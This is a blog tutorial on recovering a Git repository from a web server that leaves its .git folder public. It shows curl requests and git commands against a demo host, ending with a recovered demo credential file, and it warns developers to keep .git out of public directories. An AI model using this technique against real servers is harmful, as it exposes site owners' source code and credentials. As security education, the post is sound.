Hacking a Git Repository

Hacking a Git Repository

Rebuilding a Git repository using publicly accessible files is more straightforward than many people think, and so leaving your .git folder in your production servers —or any public server at all for that matter— opens a massive hole in your security if what you are tracking there is highly sensitive like source code and credentials.

Story Time and Context

Some time ago I worked at a company with the habit of uploading the entire Git repository to the production servers to facilitate the deployments, that’s a fair use case; however, my co-workers at the time often forgot to deny public access to this directory, a practice that they considered harmless. I cannot remember how many times I had to explain to them the consequences of doing this.

Gathering Information

Finding a vulnerable website is as simple as sending a GET request to example.com/.git/HEAD

We can make a pause here to say that an easy fix for the “vulnerability” is to move the Git folder behind the public directory, the deployments still work as long as the connection happens via SSH.

Demonstration

As a demo, I’ve created a Git repository for a super secret project and uploaded it to a website served at https://secret.test/ and of course, because I’m a smart programmer, I’ve decided not to deny access to the files inside the “.git” folder

Analyzing the HEAD

I’ll start by checking if the HEAD file exists.

Sending a simple GET request to the website and guessing the path of the “.git” folder, which in the example we are assuming is in the root directory, but in other cases, it could be further down in the file tree.

HEAD is a reference to the last commit in the currently checked-out branch.

$ curl -i "https://secret.test/.git/HEAD"
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 23
Content-Type: text/plain; charset=utf-8

ref: refs/heads/master

We can see that the server returns a “200 OK” response, meaning the request was successful, and also the content of the file, showing a reference to Git branch called “master”.

A branch in Git is a lightweight movable pointer to one of these commits. The default branch name in Git is master. As you initially make commits, the master branch points to the last commit you made. Every time you commit, it moves forward automatically.

Projects that use “Git Flow” often deploy changes using different branches, for example, develop or hotfix or even the name of a specific feature in the project. For instance, we could also find a reference named “ref/heads/develop” if the programmer has deployed the project using the work tree under the “develop” branch.

Gitflow Workflow is an abstract idea of a Git workflow design that defines a strict branching model designed around the project release. Gitflow is ideally suited for projects that have a scheduled release cycle. This workflow doesn’t add any new concepts or commands beyond what’s required for the Feature Branch Workflow. Instead, it assigns particular roles to different branches and defines how and when they should interact.

Ref: https://nvie.com/posts/a-successful-git-branching-model/

Analyzing the Branch

We can now inspect the branch reference:

$ curl -i "https://secret.test/.git/refs/heads/master"
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 41
Content-Type: text/plain; charset=utf-8

8a32c4056d72a4f481ee525b87f927e00b295edc

With this request, we’ve gotten access to one of the many hashes representing the objects that make up the entire Git tree. All objects exist inside .git/objects/ , but we have to split the hash into two parts, the first two bytes of the hash represent the name of the parent folder where the object. The other thirty-eight bytes represent the name of the object.

$ curl -s "https://secret.test/.git/objects/8a/32c4056d72a4f481ee525b87f927e00b295edc" | hexdump -v -C
00000000  78 01 95 93 c9 0e ab 46  10 45 b3 e6 2b 7a 6f 25  |x......F.E..+zo%|
00000010  80 19 4c 4b 79 51 98 0c  d8 98 c9 18 03 3b 68 9a  |..LKyQ.......;h.|
00000020  c1 c6 d8 b4 c1 0c 5f 1f  e7 45 d9 65 93 92 4a 57  |......_..E.e..JW|
[…]
00000320  ff 95 18 4a 2e 0a f0 46  a4 79 0d 60 78 02 82 b3  |...J...F.y.`x...|
00000330  02 0c 35 06 e8 d9 95 4d  35 92 6c 68 9e 1d 28 9b  |..5....M5.lh..(.|
00000340  16 53 7f 01 24 f3 62 88                           |.S..$.b.|
00000348

Analyzing the Object

At first, I didn’t know the encoding of Git objects, so I went ahead and inspected the file:

$ file 32c4056d72a4f481ee525b87f927e00b295edc
object: VAX COFF executable not stripped - version 3224

The Common Object File Format (COFF) is a format for executable, object code, and shared library computer files used on Unix systems. It was introduced in Unix System V, replaced the previously used a.out format, and formed the basis for extended specifications such as XCOFF and ECOFF, before being largely replaced by ELF, introduced with SVR4.

COFF’s main improvement over a.out was the introduction of multiple named sections in the object file. Different object files could have different numbers and types of sections.

https://en.wikipedia.org/wiki/COFF

Unfortunately, Git objects are not precisely “COFF” blobs.

Git stores its objects by Zlib compressing them, which is why it is difficult for the file command to make any sense out of them. When we create a new repository, Git first creates a header for the content, then adds the content to the header, creates the SHA-1 hash of such data and finally Zlib compresses it to store to disk.

Reading through the Git man page, we can find a tool listed under the Interrogation section, called git cat-file. Also, just like the Unix cat command, git cat-file is used to display the contents, type or size of a repository object, be it either of type commit, tree or blob.

We can inspect the type of object:

$ git cat-file -t 8a32c4056d72a4f481ee525b87f927e00b295edc
commit

We can also inspect the object size:

$ git cat-file -s 8a32c4056d72a4f481ee525b87f927e00b295edc
1099

We can also inspect the content:

$ git cat-file -p 8a32c4056d72a4f481ee525b87f927e00b295edc
tree 309b205498a0a719916c583eefeb22eed0aae69e
parent 65844bce2edc0607aa9bb4e8f728f7e8c4c7e4b3
author cixtor <[email protected]> 1544293897 -0800
committer cixtor <[email protected]> 1544293897 -0800
gpgsig -----BEGIN PGP SIGNATURE-----

 OTdiNTBmYjc5MjcyMGYzNTdmNzIzNTQyM/2JlYWVlYmIzMmQ0YjM3ZQNj/BkODI0
 NDZjMz//EwM2RiNDg1MjQwMmQxMGQ4NWI/1NzYzNmVmY2NlYwNDA4Yzll/MWE2NT
 g/5NTAxODdmNmQxOTAwN2Q2M2Q3MTk/5ODk1MWRhYQZTJk+ODYxYjZkZTY2NTY3M
 Tc4MjMxNjhkZmQ4ZWNmNWYyZTNjMGYwO+QNDQyZGUyM2FhYjQzMDcwNTk+1M2VjN
 jQ4NTRjM2F/iNWQ4Y2ViNThmOQYmY3YTc2/NzQxOTc3+ZjdhMmUwYjY4ODkzMTkz
 Y2I0ZDZkN2YyOWMyMgOGY2/N2ZlOWQ3ODc5M+DU2NWM5NzlhNDIzOTQ4/MTk5Y/z
 ZjYjNiOTAzYQM2M5N2RmNjZlYmU1NGU2Y2E0NzUwMz/Y3NGQzOTQyZGFmM2QyY2I
 1MgNGRjODAwZDliODU2NzkyZTYzYm/FhMWU5YTAxZDgyODY1Yzg1NzMyM+gYjYwN
 DBmNjY5M2ZkZDgzYzYyZDhkNTE4MzQ2NjZkMjI5NTk4NTNiYwNTcxMWVhYzAyM2E
 5NjNkZWVkYWFiYTc1NDMzNjFmOD+I1YmYxMDlmZgNWY0MDcwN2/Y4NGNlM2IyODl
 jOTU5NWZl+Njk4NGNiYzFlNTc4NDM4MAODhhYmYyZjdhOWQxNTMxYTQ0ZTY5YTk3
 MzMwYjg1NDM4NjcyZj+I2NwN2Y/2ZGVlMTE5NGQ4ZGNmYzU0OGM=
 3ZDl/
 -----END PGP SIGNATURE-----

Add script to read the configuration file

Great! We’ve done it.

Now we got the first Git object decoded, and we can already see useful information, for example, the email address of both the author and the person responsible for the commit, which in some cases may be different. We can also see the hash of the parent commit, which we later can use to continue building the rest of the Git tree. Moreover, at the very end of the output, the commit message.

We can also see, at least in this demo, the PGP signature.

Download All Objects

We can iterate over the previous steps to get a copy of the entire Git tree by merely changing the hash to the one tagged as “parent” inside each object. In the example above, we can see that the parent hash of 8a32c40 is 65844bc so let’s go ahead and download that one:

# https://secret.test/.git/objects/65/844bce2edc0607aa9bb4e8f728f7e8c4c7e4b3

$ git cat-file -p 65844bc
tree 2527ba1c4a08175454a90c893bd452e5f7a008da
parent 205040993f81fb0b0df94e3d6920eb109b243640
author cixtor <[email protected]> 1544293884 -0800
committer cixtor <[email protected]> 1544293884 -0800

Add credentials to access the application

The parent commit of 65844bc is 2050409 let’s download that too:

# https://secret.test/.git/objects/20/5040993f81fb0b0df94e3d6920eb109b243640

$ git cat-file -p 205040993f81fb0b0df94e3d6920eb109b243640
tree afda558484e1250869fd26a887de3a7fc42a2f04
author cixtor <[email protected]> 1544293869 -0800
committer cixtor <[email protected]> 1544293869 -0800

Add project description

There are no more parents, so this must be the last commit.

Download the Index

However, that’s not the end of the game. We also need to recursively download all the objects tagged as “tree” with a reference on each commit. They contain the actual data of the files in the repository. Fortunately, the process is not different from getting the commit objects, so let me skip some commands:

https://secret.test/.git/objects/30/9b205498a0a719916c583eefeb22eed0aae69e
https://secret.test/.git/objects/25/27ba1c4a08175454a90c893bd452e5f7a008da
https://secret.test/.git/objects/af/da558484e1250869fd26a887de3a7fc42a2f04

Download the Blobs

We can inspect the tree objects the same way we do with commit objects:

$ git cat-file -p afda558
100644 blob 95a07df7b2dc89519fb7f8ec2718a1b9489b3880  README.md

$ git cat-file -p 2527ba1
100644 blob 95a07df7b2dc89519fb7f8ec2718a1b9489b3880  README.md
100644 blob 4912545916f85dff77b0906954ddae99f5d698ba  config.json

$ git cat-file -p 309b205
100644 blob 95a07df7b2dc89519fb7f8ec2718a1b9489b3880  README.md
100644 blob 4912545916f85dff77b0906954ddae99f5d698ba  config.json
100644 blob 3c46072b78a65b31cf3399d176236f1ba31f692f  index.php

Here we can see how the project has progressed. At first, there was only a Markdown file called “README.md”, then after one of the commits analyzed above, a new file called “config.json” was added to the tree, and then “index.php” in a subsequent commit.

To get a copy of the files, we need to download the blobs referenced on each tree object.

Getting a copy of the latest version of the Git tree is useful if you only care about the current state of the project. Getting a copy of the content of the repository for a specific commit makes sense if you know what you are looking for, for example, if you find in the commit messages references to secret files, credentials, access keys, or passwords. If you have enough time, you may want to download the entire Git history.

https://secret.test/.git/objects/95/a07df7b2dc89519fb7f8ec2718a1b9489b3880
https://secret.test/.git/objects/49/12545916f85dff77b0906954ddae99f5d698ba
https://secret.test/.git/objects/3c/46072b78a65b31cf3399d176236f1ba31f692f

Exploring the Git Tree

After downloading the HEAD, current branch and commit objects, we have this:

$ tree -a -- .git/
.git
├── HEAD
├── objects
│   ├── 20/5040993f81fb0b0df94e3d6920eb109b243640 (commit)
│   ├── 25/27ba1c4a08175454a90c893bd452e5f7a008da (tree)
│   ├── 30/9b205498a0a719916c583eefeb22eed0aae69e (tree)
│   ├── 3c/46072b78a65b31cf3399d176236f1ba31f692f (blob)
│   ├── 49/12545916f85dff77b0906954ddae99f5d698ba (blob)
│   ├── 65/844bce2edc0607aa9bb4e8f728f7e8c4c7e4b3 (commit)
│   ├── 8a/32c4056d72a4f481ee525b87f927e00b295edc (commit)
│   ├── 95/a07df7b2dc89519fb7f8ec2718a1b9489b3880 (blob)
│   └── af/da558484e1250869fd26a887de3a7fc42a2f04 (tree)
└── refs/heads/master

7 directories, 5 files

We can now use commands like git log to inspect the history:

$ git log --pretty="format:%h <%ae> %s"
8a32c40 <[email protected]> Add script to read the configuration file
65844bc <[email protected]> Add credentials to access the application
2050409 <[email protected]> Add project description

Or git show [commit] to inspect a specific commit:

$ git show 65844bc
commit 65844bce2edc0607aa9bb4e8f728f7e8c4c7e4b3
Author: cixtor <[email protected]>

    Add credentials to access the application

diff --git a/config.json b/config.json
new file mode 100644
index 0000000..4912545
--- /dev/null
+++ b/config.json
@@ -0,0 +1,4 @@
+{
+  "username": "[email protected]",
+  "password": "p455w0rd"
+}

Or git status to inspect the current status of the repository:

$ git status
On branch master
Changes to be committed:
  (use "git reset HEAD <file>..." to unstage)

  deleted:    README.md
  deleted:    config.json
  deleted:    index.php

We can even reset the repository to recover the deleted files.

$ git reset --hard HEAD
HEAD is now at 8a32c40 Add script to read the configuration file

$ ls -1a
.
..
.git
README.md
config.json
index.php

$ jq . < config.json
{
  "username": "[email protected]",
  "password": "p455w0rd"
}

Conclusion

Now you understand why leaving your .git directory exposed is a bad idea.

I hope you have enjoyed the article, share it with your colleagues.

Happy Hacking!

Do you have a project idea? Let's make it together!